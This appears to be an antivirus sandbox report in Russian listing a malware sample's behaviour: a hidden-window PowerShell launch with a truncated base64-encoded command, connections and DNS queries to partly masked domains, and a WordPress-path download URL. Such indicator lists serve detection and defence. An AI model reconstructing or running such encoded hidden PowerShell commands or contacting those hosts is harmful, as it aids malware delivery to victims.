Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\777758.cvr
- 'se####karakas.com':443
- 'de#.##ecipart.com':80
- 'te###stack.com':443
- http://de#.##ecipart.com/wp-admin/l9s06/
- 'se####karakas.com':443
- 'te###stack.com':443
- DNS ASK se####karakas.com
- DNS ASK te##.##ibakkendine.com
- DNS ASK de#.##ecipart.com
- DNS ASK te###stack.com
- DNS ASK bl##.#egaxis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...' (со скрытым окном)